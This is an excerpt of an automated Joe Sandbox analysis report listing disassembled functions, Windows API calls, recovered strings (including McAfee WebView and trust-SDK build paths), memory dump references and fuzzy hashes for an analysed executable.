                                • SetWindowPos.USER32(000701F0,00000000,?,?,00000000,00000000,00000005), ref: 003F1A6D
                                • UpdateWindow.USER32(000701F0), ref: 003F1A78
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Window$ErrorLast$PointsUpdate
                                • String ID:
                                • API String ID: 3689522800-0
                                • Opcode ID: 9dc0050f130e60fee7c19759e86ed600fae5d6dce2fb5ba9406a61057315a4ea
                                • Instruction ID: af33f114cbe5495fb11b0ab00fdacaf98e57474062a8023dfa38ace353135fa6
                                • Opcode Fuzzy Hash: 9dc0050f130e60fee7c19759e86ed600fae5d6dce2fb5ba9406a61057315a4ea
                                • Instruction Fuzzy Hash: 0E21E632B112089BDB18AB69EC46B7E7769EB45710F45823AEA00EF2C0DA709C4087A4
                                Function 003EEF50 Relevance: 7.6, APIs: 5, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003EEF8A
                                • VariantChangeType.OLEAUT32(00000000,?,00000000,00000016), ref: 003EEFB2
                                • VariantClear.OLEAUT32(00000000), ref: 003EEFC3
                                • _com_issue_error.COMSUPP ref: 003EEFE6
                                • VariantClear.OLEAUT32 ref: 003EEFF1
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType_com_issue_error
                                • String ID:
                                • API String ID: 1212853886-0
                                • Opcode ID: 5ecd299c4ce41e0ecbeac9e21b21b963b17db2624a96bf27ce84fe606815ee3b
                                • Instruction ID: e917be332f313c1c6a240bd6431aab7dd30bf0f625ae27ae6d53840eaae03aa8
                                • Opcode Fuzzy Hash: 5ecd299c4ce41e0ecbeac9e21b21b963b17db2624a96bf27ce84fe606815ee3b
                                • Instruction Fuzzy Hash: 5E1182719002699BCF11DFA5DC09BEEB7B8FB08710F11066AF906E3280E778A9008B54
                                Function 00425CFF Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(00464694), ref: 00425D09
                                • RtlLeaveCriticalSection.NTDLL(00464694), ref: 00425D3C
                                • RtlWakeAllConditionVariable.NTDLL ref: 00425DB3
                                • SetEvent.KERNEL32(?,00468BFC,00000000), ref: 00425DBD
                                • ResetEvent.KERNEL32(?,00468BFC,00000000), ref: 00425DC9
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                • String ID:
                                • API String ID: 3916383385-0
                                • Opcode ID: a4d7bf17308a6932b9b0123d5e586d96897f9aeae6bc94f5ae367e7565c17200
                                • Instruction ID: f47f689fa3752821764c6dd8cb8a8123b7c86147cbdeb28ab0ced11fdb5eca25
                                • Opcode Fuzzy Hash: a4d7bf17308a6932b9b0123d5e586d96897f9aeae6bc94f5ae367e7565c17200
                                • Instruction Fuzzy Hash: 45016935604620DBCB40AF58FC489D93BA5EB4B321701403AE98683320DBBA1850CB9E
                                Function 0040D3C0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 270COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,?,?,?,?,0043C8A0,000000FF), ref: 0040D496
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: gfff$gfff
                                • API String ID: 3664257935-3084402119
                                • Opcode ID: 65b6dacbda685d9c02bc02ce79e6de3c895264d81f6649f8fa1f63dbc275bed8
                                • Instruction ID: 3e3ede0adb91e5c4c5c10ef56fe66979b5266e33e24a133606173c6da68c702f
                                • Opcode Fuzzy Hash: 65b6dacbda685d9c02bc02ce79e6de3c895264d81f6649f8fa1f63dbc275bed8
                                • Instruction Fuzzy Hash: C3A1D071A009019BE71CCF68D998B6AB7A5FF45314F14422EE41AC7BD0D738F964CB88
                                Function 003E5D00 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003E68E2
                                • IsDebuggerPresent.KERNEL32 ref: 003E69EC
                                • OutputDebugStringW.KERNEL32(00000000), ref: 003E6A78
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                • String ID: wil
                                • API String ID: 4268342597-1589926490
                                • Opcode ID: bd77af5e1b1f97c336e87d1976f8b351dc962baa5fc393ed48c4670262048c09
                                • Instruction ID: 69057e2ce34c678108e7a59efbd7621c365bb08abb40bf2afa19a24bd27b80fa
                                • Opcode Fuzzy Hash: bd77af5e1b1f97c336e87d1976f8b351dc962baa5fc393ed48c4670262048c09
                                • Instruction Fuzzy Hash: D471BFB0D042A99BDB25CF66DC417E9B7F4BB19344F0442E9E409A32E1EB709E84CF55
                                Function 003E5A40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 187threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 003E5B07
                                • IsDebuggerPresent.KERNEL32 ref: 003E5C2D
                                • OutputDebugStringW.KERNEL32(00000000), ref: 003E5CB9
                                Strings
                                • E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\McWebViewContainer\packages\Microsoft.Windows.ImplementationLibrary.1.0.220201.1\include\wil\resource.h, xrefs: 003E5B3F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                • String ID: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\McWebViewContainer\packages\Microsoft.Windows.ImplementationLibrary.1.0.220201.1\include\wil\resource.h
                                • API String ID: 4268342597-2755879635
                                • Opcode ID: 3bcd7ff38c0f0caa38754b5a0440f45b959debd42521bd1dfdc8464b4b45992a
                                • Instruction ID: 7fc05a31c4b371fe0ac500e3f8e09489b96a814073ddd13671f1151444b63737
                                • Opcode Fuzzy Hash: 3bcd7ff38c0f0caa38754b5a0440f45b959debd42521bd1dfdc8464b4b45992a
                                • Instruction Fuzzy Hash: EE717DB09007A99BDB25CF65CC407D9B7F8AB09308F1446E9E409E32E1E7749AC4CF62
                                Function 003F5F10 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177COMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 003F6043
                                • __Cnd_destroy_in_situ.LIBCPMT ref: 003F607B
                                • __Mtx_destroy_in_situ.LIBCPMT ref: 003F6084
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Cnd_destroy_in_situConcurrency::cancel_current_taskMtx_destroy_in_situ
                                • String ID: P`?
                                • API String ID: 3272402957-1080471864
                                • Opcode ID: 44a94d76672ee20fba1cabc7053207d8716def74b84213f7f030b4e7cd71e2e1
                                • Instruction ID: 50ac9da0f7f4d9e2e778fa5fc659b29988868c3309b599b367e95d1e319b1461
                                • Opcode Fuzzy Hash: 44a94d76672ee20fba1cabc7053207d8716def74b84213f7f030b4e7cd71e2e1
                                • Instruction Fuzzy Hash: 27518771B047088BD725DE78A882A3AB3E8EF40310F64063EF652C7782DB75D9448791
                                Function 00408190 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • failed to initialize COM, xrefs: 00408316
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread$CloseHandle
                                • String ID: failed to initialize COM
                                • API String ID: 1930902833-2564502714
                                • Opcode ID: 75f386daee651d70121c4cc12fe4726ee70a4fae55fb0bd7af8b2a4d0eb73c40
                                • Instruction ID: 75256f8ddee4319e6a130c82454efd00c60d865174c68bf7a6c10194aca821bd
                                • Opcode Fuzzy Hash: 75f386daee651d70121c4cc12fe4726ee70a4fae55fb0bd7af8b2a4d0eb73c40
                                • Instruction Fuzzy Hash: A7519E71D006089FDB10DFA4C945BEEBBF4FF58704F20812EE905AB291EB795A48CB95
                                Function 00412AC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp, xrefs: 00412B7D
                                • failed to get exported function '%hs', xrefs: 00412B3F
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressErrorLastProc
                                • String ID: C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$failed to get exported function '%hs'
                                • API String ID: 199729137-3740449315
                                • Opcode ID: f6ce1fd7f25fbd92de7f5bc38c9daef9e4d57a828d899a1ad96faea07e254fa1
                                • Instruction ID: becbe6e2c98614305e341a5cb413f5a6f5e46a401238c6c5f897a16bfe553bf3
                                • Opcode Fuzzy Hash: f6ce1fd7f25fbd92de7f5bc38c9daef9e4d57a828d899a1ad96faea07e254fa1
                                • Instruction Fuzzy Hash: D341E370E01209AFDF04CFA9D9457DEBBB1FF45314F10816AE810AB381E7B8A954CB98
                                Function 003EDB00 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 128COMMON
                                Download Yara Rule
                                APIs
                                • SysStringLen.OLEAUT32(?), ref: 003EDBB5
                                • SysStringLen.OLEAUT32(00000000), ref: 003EDBBD
                                  • Part of subcall function 003EDD10: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003EDCD8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: ICommunicator::send_message$framework
                                • API String ID: 3379692669-3514916642
                                • Opcode ID: 2ca5daca235b5c910801b52a92d334b0d27b8c6a725a456a6e9a04b32df34cdd
                                • Instruction ID: ac26333c02a4588a0b4bf3a34708718d5f82509611166e53865892d18e47fbb4
                                • Opcode Fuzzy Hash: 2ca5daca235b5c910801b52a92d334b0d27b8c6a725a456a6e9a04b32df34cdd
                                • Instruction Fuzzy Hash: 3741F270D042A8EFDF12DBA5D945BDEBBB5EF09304F24425AE80577381E7B51900CBA5
                                Function 00411780 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 121timeCOMMON
                                Download Yara Rule
                                APIs
                                • QueryUnbiasedInterruptTime.KERNEL32(?,A05DD77D), ref: 00411683
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004116EC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: InterruptQueryTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: trust$validate_file
                                • API String ID: 2902542638-769455193
                                • Opcode ID: f94cc39cfc9bcd90f01ee91de3d780d901d72be70d17f317c0f790f8f1ebf863
                                • Instruction ID: 5592916590ab040cd813bf140895a0c7f09d648d12c345a200b905d046d790a8
                                • Opcode Fuzzy Hash: f94cc39cfc9bcd90f01ee91de3d780d901d72be70d17f317c0f790f8f1ebf863
                                • Instruction Fuzzy Hash: 1141B931E00208AFCB14CFA9D984E9EBBF5EF4A710F10852AF515A73A1E735A850CB58
                                Function 0043A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                • FindMITargetTypeInstance.LIBVCRUNTIME ref: 0043A4B9
                                • PMDtoOffset.LIBCMT ref: 0043A4DF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FindInstanceOffsetTargetType
                                • String ID: Bad dynamic_cast!
                                • API String ID: 2363274979-2956939130
                                • Opcode ID: 4164884a34979ff2bd11579d28e83fcd955ee1d1dfaac7c3f42eab862466ede4
                                • Instruction ID: 8b1297ff43ea39998ac4278e29afe322d639ca0f2bb3670cdb0fe5edd3029484
                                • Opcode Fuzzy Hash: 4164884a34979ff2bd11579d28e83fcd955ee1d1dfaac7c3f42eab862466ede4
                                • Instruction Fuzzy Hash: C7212931A40205EFCF04DF64C80696E7774FB98314F20921FEC5597281E738ED11879A
                                Function 003E7260 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00427210: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00460EFC,00000017,0042372F,?,004589A4,?), ref: 00427270
                                • ___std_exception_copy.LIBVCRUNTIME ref: 003E72BF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionRaise___std_exception_copy
                                • String ID: 0q>$0q>$@ >
                                • API String ID: 3109751735-3163198155
                                • Opcode ID: f247eb23821a48771381be2656223ef60e67b6e9e3b052128662fe558fc26af8
                                • Instruction ID: e1f6172a61cda98705fdde0f35e9d9f8386db5230a60a4a2ab38e73906224bd3
                                • Opcode Fuzzy Hash: f247eb23821a48771381be2656223ef60e67b6e9e3b052128662fe558fc26af8
                                • Instruction Fuzzy Hash: 90018FB2600709AFC301EFA5D841886F7ECFF593107108A2BF62887651FB74E528CB98
                                Function 003E37C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E37E9
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E381A
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003E3838
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeHeap$___std_exception_destroy
                                • String ID: @ >
                                • API String ID: 2050543389-3678301659
                                • Opcode ID: 5fa7e72d57e2b0e1ed13cc7664bcc5859c4b125160482bea402f1c222902df3a
                                • Instruction ID: 33b60d6fee8d6c67478ffddcf7997e8f57f31b0a37e944b96b470843a17fcc3c
                                • Opcode Fuzzy Hash: 5fa7e72d57e2b0e1ed13cc7664bcc5859c4b125160482bea402f1c222902df3a
                                • Instruction Fuzzy Hash: 3F1104B5601716ABE7109F26EC48B12BB68FF42325F114228F60087690D7B8FC28CBE0
                                Function 003FE7F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52libraryCOMMON
                                Download Yara Rule
                                APIs
                                • SetLastError.KERNEL32(00000000,00000000,?,00411CDE,00000000,00000000,0000003C,0000000F,A05DD77D,?,000000A8), ref: 003FE800
                                • LoadLibraryW.KERNEL32 ref: 003FE817
                                • GetLastError.KERNEL32 ref: 003FE82C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
